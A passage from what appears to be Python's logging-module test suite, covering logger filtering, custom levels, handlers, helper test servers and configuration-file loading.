('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_regression_22386(self):
"""See issue #22386 for more information."""
self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')
def test_regression_29220(self):
"""See issue #29220 for more information."""
logging.addLevelName(logging.INFO, '')
self.addCleanup(logging.addLevelName, logging.INFO, 'INFO')
self.assertEqual(logging.getLevelName(logging.INFO), '')
def test_issue27935(self):
fatal = logging.getLevelName('FATAL')
self.assertEqual(fatal, logging.FATAL)
def test_regression_29220(self):
"""See issue #29220 for more information."""
logging.addLevelName(logging.INFO, '')
self.addCleanup(logging.addLevelName, logging.INFO, 'INFO')
self.assertEqual(logging.getLevelName(logging.INFO), '')
self.assertEqual(logging.getLevelName(logging.NOTSET), 'NOTSET')
self.assertEqual(logging.getLevelName('NOTSET'), logging.NOTSET)
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* too many handlers in the tests,
# but we can try instantiating them with various options
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fd, fn = tempfile.mkstemp()
os.close(fd)
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
# Now remove the file.
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
# The next call should recreate the file.
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except OSError: # syslogd might not be available
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
def test_path_objects(self):
"""
Test that Path objects are accepted as filename arguments to handlers.
See Issue #27493.
"""
fd, fn = tempfile.mkstemp()
os.close(fd)
os.unlink(fn)
pfn = pathlib.Path(fn)
cases = (
(logging.FileHandler, (pfn, 'w')),
(logging.handlers.RotatingFileHandler, (pfn, 'a')),
(logging.handlers.TimedRotatingFileHandler, (pfn, 'h')),
)
if sys.platform in ('linux', 'darwin'):
cases += ((logging.handlers.WatchedFileHandler, (pfn, 'w')),)
for cls, args in cases:
h = cls(*args)
self.assertTrue(os.path.exists(fn))
h.close()
os.unlink(fn)
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
self.deletion_time = time.time()
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
self.handle_time = None
self.deletion_time = None
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
try:
self.handle_time = time.time()
h.handle(r)
except Exception:
print('Deleted at %s, '
'opened at %s' % (self.deletion_time,
self.handle_time))
raise
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
with support.captured_stderr() as stderr:
h.handle(r)
msg = '\nRuntimeError: deliberate mistake\n'
self.assertIn(msg, stderr.getvalue())
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
h.handle(r)
self.assertEqual('', stderr.getvalue())
finally:
logging.raiseExceptions = old_raise
def test_stream_setting(self):
"""
Test setting the handler's stream
"""
h = logging.StreamHandler()
stream = io.StringIO()
old = h.setStream(stream)
self.assertIs(old, sys.stderr)
actual = h.setStream(old)
self.assertIs(actual, stream)
# test that setting to existing value returns None
actual = h.setStream(old)
self.assertIsNone(actual)
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
class TestSMTPServer(smtpd.SMTPServer):
"""
This class implements a test SMTP server.
:param addr: A (host, port) tuple which the server listens on.
You can specify a port value of zero: the server's
*port* attribute will hold the actual port number
used, which can be used in client connections.
:param handler: A callable which will be called to process
incoming messages. The handler will be passed
the client address tuple, who the message is from,
a list of recipients and the message data.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
:param sockmap: A dictionary which will be used to hold
:class:`asyncore.dispatcher` instances used by
:func:`asyncore.loop`. This avoids changing the
:mod:`asyncore` module's global state.
"""
def __init__(self, addr, handler, poll_interval, sockmap):
smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
decode_data=True)
self.port = self.socket.getsockname()[1]
self._handler = handler
self._thread = None
self.poll_interval = poll_interval
def process_message(self, peer, mailfrom, rcpttos, data):
"""
Delegates to the handler passed in to the server's constructor.
Typically, this will be a test case method.
:param peer: The client (host, port) tuple.
:param mailfrom: The address of the sender.
:param rcpttos: The addresses of the recipients.
:param data: The message.
"""
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
"""
Start the server running on a separate daemon thread.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the :mod:`asyncore` loop until normal termination
conditions arise.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
"""
asyncore.loop(poll_interval, map=self._map)
def stop(self, timeout=None):
"""
Stop the thread by closing the server instance.
Wait for the server thread to terminate.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.close()
support.join_thread(self._thread, timeout)
self._thread = None
asyncore.close_all(map=self._map, ignore_all=True)
class ControlMixin(object):
"""
This mixin is used to start a server on a separate thread, and
shut it down programmatically. Request handling is simplified - instead
of needing to derive a suitable RequestHandler subclass, you just
provide a callable which will be passed each received request to be
processed.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request. This handler is called on the
server thread, effectively meaning that requests are
processed serially. While not quite Web scale ;-),
this should be fine for testing applications.
:param poll_interval: The polling interval in seconds.
"""
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
"""
Create a daemon thread to run the server, and start it.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the server. Set the ready flag before entering the
service loop.
"""
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self, timeout=None):
"""
Tell the server thread to stop, and wait for it to do so.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.shutdown()
if self._thread is not None:
support.join_thread(self._thread, timeout)
self._thread = None
self.server_close()
self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
"""
An HTTP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval in seconds.
:param log: Pass ``True`` to enable log messages.
"""
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
def __getattr__(self, name, default=None):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except OSError as e:
# socket errors are silenced by the caller, print them here
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
"""
A TCP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a single
parameter - the request - in order to process the request.
:param poll_interval: The polling interval in seconds.
:bind_and_activate: If True (the default), binds the server and starts it
listening. If False, you need to call
:meth:`server_bind` and :meth:`server_activate` at
some later time before calling :meth:`start`, so that
the server will set up the socket and listen on it.
"""
allow_reuse_address = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
"""
A UDP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval for shutdown requests,
in seconds.
:bind_and_activate: If True (the default), binds the server and
starts it listening. If False, you need to
call :meth:`server_bind` and
:meth:`server_activate` at some later time
before calling :meth:`start`, so that the server will
set up the socket and listen on it.
"""
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except OSError:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
super(TestUDPServer, self).server_close()
self._closed = True
if hasattr(socket, "AF_UNIX"):
class TestUnixStreamServer(TestTCPServer):
address_family = socket.AF_UNIX
class TestUnixDatagramServer(TestUDPServer):
address_family = socket.AF_UNIX
# - end of server_helper section
class SMTPHandlerTest(BaseTest):
# bpo-14314, bpo-19665, bpo-34092: don't wait forever, timeout of 1 minute
TIMEOUT = 60.0
def test_basic(self):
sockmap = {}
server = TestSMTPServer((support.HOST, 0), self.process_message, 0.001,
sockmap)
server.start()
addr = (support.HOST, server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
timeout=self.TIMEOUT)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello \u2713'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(self.TIMEOUT)
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello \u2713'))
h.close()
def process_message(self, *args):
self.messages.append(args)
self.handled.set()
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
def test_flush_on_close(self):
"""
Test that the flush-on-close configuration works as expected.
"""
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
self.mem_logger.removeHandler(self.mem_hdlr)
# Default behaviour is to flush on close. Check that it happens.
self.mem_hdlr.close()
lines = [
('DEBUG', '1'),
('INFO', '2'),
]
self.assert_log_lines(lines)
# Now configure for flushing not to be done on close.
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr,
False)
self.mem_logger.addHandler(self.mem_hdlr)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.info(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.removeHandler(self.mem_hdlr)
self.mem_hdlr.close()
# assert that no new lines have been added
self.assert_log_lines(lines) # no change
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger, and uses kwargs instead of args.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
kwargs={'stream': sys.stdout,}
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config 8, check for resource warning
config8 = r"""
[loggers]
keys=root
[handlers]
keys=file
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=file
[handler_file]
class=FileHandler
level=DEBUG
args=("{tempfile}",)
"""
disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file, **kwargs)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config0_using_cp_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
file = io.StringIO(textwrap.dedent(self.config0))
cp = configparser.ConfigParser()
cp.read_file(file)
logging.config.fileConfig(cp)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config8_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
# Replace single backslash with double backslash in windows
# to avoid unicode error during string formatting
if os.name == "nt":
fn = fn.replace("\\", "\\\\")
config8 = self.config8.format(tempfile=fn)
self.apply_config(config8)
self.apply_config(config8)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def test_logger_disabling(self):
self.apply_config(self.disable_test)
logger = logging.getLogger('some_pristine_logger')
self.assertFalse(logger.disabled)
self.apply_config(self.disable_test)
self.assertTrue(logger.disabled)
self.apply_config(self.disable_test, disable_existing_loggers=False)
self.assertFalse(logger.disabled)
def test_defaults_do_no_interpolation(self):
"""bpo-33802 defaults should not get interpolated"""
ini = textwrap.dedent("""
[formatters]
keys=default
[formatter_default]
[handlers]
keys=console
[handler_console]
class=logging.StreamHandler
args=tuple()
[loggers]
keys=root
[logger_root]
formatter=default
handlers=console
""").strip()
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.ini')
try:
os.write(fd, ini.encode('ascii'))
os.close(fd)
logging.config.fileConfig(
fn,
defaults=dict(
version=1,
disable_existing_loggers=False,
formatters={
"generic": {
"format": "%(asctime)s [%(process)d] [%(levelname)s] %(message)s",
"datefmt": "[%Y-%m-%d %H:%M:%S %z]",
"class": "logging.Formatter"
},
},
)
)
finally:
os.unlink(fn)
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
server_class = TestTCPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_socket, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SocketHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
"""Shutdown the TCP server."""
try:
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
if self.server:
self.server.stop(2.0)
finally:
BaseTest.tearDown(self)
def handle_socket(self, request):
conn = request.connection
while True:
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
def test_output(self):
# The log message sent to the SocketHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("tcp")
logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
if self.server_exception:
self.skipTest(self.server_exception)
# Avoid timing-related failures due to SocketHandler's own hard-wired
# one-second timeout on socket.create_connection() (issue #16264).
self.sock_hdlr.retryStart = 2.5
# Kill the server
self.server.stop(2.0)
# The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertGreater(self.sock_hdlr.retryTime, now)
